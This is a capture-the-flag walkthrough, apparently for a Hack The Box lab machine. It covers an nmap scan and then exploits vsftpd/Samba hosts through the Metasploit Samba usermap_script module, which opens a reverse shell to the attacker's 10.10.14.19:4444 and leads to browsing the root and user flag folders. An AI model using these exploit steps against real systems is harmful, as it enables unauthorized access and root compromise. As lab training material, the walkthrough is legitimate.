Phase 1: Recon

  • IP Address: 10.10.10.3

Phase 2: Scanning

Nmap

nmap -A -T4 <ipaddress>

Using the “-A ” parameter enables OS and service detection , while the “-T4” enables faster execution

21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)****
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 83.41 ms 10.10.14.1
2 84.00 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.22 seconds

Findings:

  • OS: Linux

Phase 3: Exploitation

Exploit Samba

You can user the searchsploit from the command line to search for exploits , then using https://www.rapid7.com/db/ you search to see if there is a Metasploit module.

(note : If using Parrot OS you will need to install searchsploit by using sudo apt-get install exploitdb)

msf > use exploit/multi/samba/usermap_script msf exploit(multi/samba/usermap_script) > set lhost tun0
msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
msf exploit(usermap_script) > exploit

lhost: attacker machine IP Address

(note : as we using openvpn to tunneling our network interface is named tun0, we can use that instead of the attacker IP address )

rhost : remote host or victims IP address

(note: you can also use run instead of exploit )

Phase 4: Gaining Access/Maintaining access

Accessing root & user folders

msf6 exploit(multi/samba/usermap_script) > exploit[*] Started reverse TCP handler on 10.10.14.19:4444 
[*] Command shell session 1 opened (10.10.14.19:4444 -> 10.10.10.3:40447)
cd /root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
.
.
.
cd /home/makis
ls
user.txt

Phase 5: Covering tracks

Exit Session

Press Ctrl and C to abort the session

Abort session 1? [y/N]  y[*] 10.10.10.3 - Command shell session 1 closed.  Reason: User exit